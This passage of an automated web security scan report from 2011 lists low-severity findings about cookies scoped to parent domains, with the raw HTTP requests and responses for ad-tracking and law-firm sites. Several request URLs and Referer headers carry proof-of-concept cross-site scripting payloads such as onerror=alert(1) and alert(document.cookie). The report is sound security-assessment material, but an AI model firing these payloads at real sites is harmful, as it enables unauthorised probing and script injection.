Set-Cookie: DomainUserProfile=AnonymousId=0ef466e3216c4abc87c7c7deaeb7cb01&LastSeenDateTime=1/19/2011 4:51:27 PM&IssueDateTime=1/19/2011 4:51:27 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Fri, 26-Dec-2110 16:51:27 GMT; path=/
Cache-Control: public
Expires: Wed, 19 Jan 2011 17:51:27 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribu
...[SNIP]...

9.2. http://www.fulbright.com/dc  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /dc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dc HTTP/1.1
Host: www.fulbright.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:08:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/
Set-Cookie: CFTOKEN=35971701;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A41%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A40%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/
Content-Type: text/html; charset=UTF-8


                       <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski



...[SNIP]...

9.3. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035991&rn=57307763&c7=http%3A%2F%2Fwww.yellowpages.com%2FWashington-DC74302%253Cimg%2520src%253da%2520onerror%253dalert(1)%253E9c7a66be0e0%2FAttorneys&c8=No%20Location%20Found%20-%20YP.com&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 19 Jan 2011 15:26:51 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 18-Jan-2013 15:26:51 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


9.4. http://d7.zedo.com/OzoDB/cutils/R52_5/jsc/933/egc.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /OzoDB/cutils/R52_5/jsc/933/egc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_5/jsc/933/egc.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2608430956
Cache-Control: max-age=2007212
Expires: Fri, 11 Feb 2011 23:40:50 GMT
Date: Wed, 19 Jan 2011 18:07:18 GMT
Connection: close



9.5. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 911
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0daa-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=285
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:14 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo
...[SNIP]...

9.6. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=301
Expires: Wed, 19 Jan 2011 15:55:44 GMT
Date: Wed, 19 Jan 2011 15:50:43 GMT
Connection: close
Content-Length: 2277

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...

9.7. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fmr.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 912
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Wed, 19 Jan 2011 18:11:59 GMT
Date: Wed, 19 Jan 2011 18:07:15 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo
...[SNIP]...

9.8. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-401/d3/jsc/gl.js HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFCap=1463B1219,174796|0,11,1; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=1099,2,14; FFad=0; aps=1
If-None-Match: "812b9ff1-5d7-4989a5a58d7c0"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Thu, 19 Jan 2012 15:50:46 GMT;domain=.zedo.com;path=/;
ETag: "812b9ff1-5d7-4989a5a58d7c0"
Vary: Accept-Encoding
X-Varnish: 2233581894 2233581891
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=326057
Expires: Sun, 23 Jan 2011 10:25:03 GMT
Date: Wed, 19 Jan 2011 15:50:46 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

9.9. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=1483&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/ADO/iview/278612752/direct;wi.1;hi.1/01?click=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; aps=1; FFgeo=5386156; FFcat=933,56,15:1099,2,14; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=749B826,20|1483_749#365;expires=Thu, 19 Jan 2012 15:50:47 GMT;domain=.zedo.com;path=/;
ETag: "6c17875e-7054-4942082502f40"
X-Varnish: 1435724280 1435712339
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=10740
Expires: Wed, 19 Jan 2011 18:49:47 GMT
Date: Wed, 19 Jan 2011 15:50:47 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

9.10. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.csmonitor.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 179
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 15:51:10 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 15:51:10 GMT; Path=/
Set-Cookie: di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 12:57:24 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 15:51:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 15:51:10 GMT
Connection: close

_ate.ad.hpr({"urls":["http://segment-pixel.invitemedia.com/pixel?pixelID=38582&partnerID=169&key=segment"],"segments" : ["19F"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

9.11. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K08784&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NVPpKSpj3p3uht7FyYbjN10zcmhKlYGgrukmLuVU97bs7miUcEYhUoOEQoW6hq+QzluB96P8Tutq8Gx/9mt2RRtWTTDFMPnlXOlgYExrUWbzd6XsS3YDB9n8sEO7rJWMBAqM62rPEc1V/be727XdvCMrTAr9wCWxHSaoTomecJyXQpHihffMuEVRzw8h3OxDNuVJgjD7Ih9Ly8ngvXt2rt4SmNQxGHu6UbQFB9GchtzgDx3nIlBpeezAjFRoVM/vHBxUmvtH+1bbl1Fl4ZdnrmM5b1W59yZWpmuOnSSf2k8PLj3aIydPWaqBjSCH4kLnkkd3V9G4pc1/iB+wt5HJPWxDEtpBQKliPLyOJqSHo3GZg11SnpmwXl2EB62oOwnJfXRIG68qmghWJ1ubkNZO3R4IUrINcOdCEzftiZjz6BFLEjMtt/bWMBlAXwgUgztsoo2ReD/q2/z4a41kA0Ypr8hKYa5H4msA1vfs8KMUJI39rh63+qDIG2f7MA7byhF9bF8U8P3xPeIB9DYWg6UQ/TE2BPMUNqktnd2vc2dilAmnnt9dcZ38/Q0Cyzd7bFlqzPGdqxg5MzrB4+r6J8c5Q0sZ/FB9HiflUF+cbGnLI6nnK2Uc9cyirS/6Md3KUSQ9eMlES7QuYhvG9NQMPPFPEgeFZVaJzY2Z3FyVapNr93Ni+GtlNI57fSPs+pJWw/lFgUYqf4s9/eIB9m3CKZDLWKxdGYeWDmGFQAfUIDoKUvXwnyf9wrwJoT/ZmJjMt9jNm1+QrjX0vap9RkKG/ygD/eKI9TYoaK5Y/J79Ulj12hC7mVVyE3wjhR0e9GaRiyqRhbuEG3Z2Ib5J8zbDEd4LC6/1dthK3LavDLQy0A5z3p/krZoaCL1QKiV9JDBOBn4j8npeNRYQzTnQhiiv9rOapvQUNE/nUhaxuRqyT9YwXp0DiJuezLHxHOAtqsBAvJ7lll2Zm7ClWHDEew07dWhx+WXkK3XEm1YAxR/7f9yvpGkXfWY1x6RuGiP7tA==; Domain=.revsci.net; Expires=Thu, 19-Jan-2012 17:54:40 GMT; Path=/
Last-Modified: Wed, 19 Jan 2011 17:54:40 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 20 Jan 2011 17:54:40 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Wed, 19 Jan 2011 17:54:39 GMT
Content-Length: 5867

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...

9.12. http://landesm.gfi.com/event-log-analysis-sm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:09:09 GMT
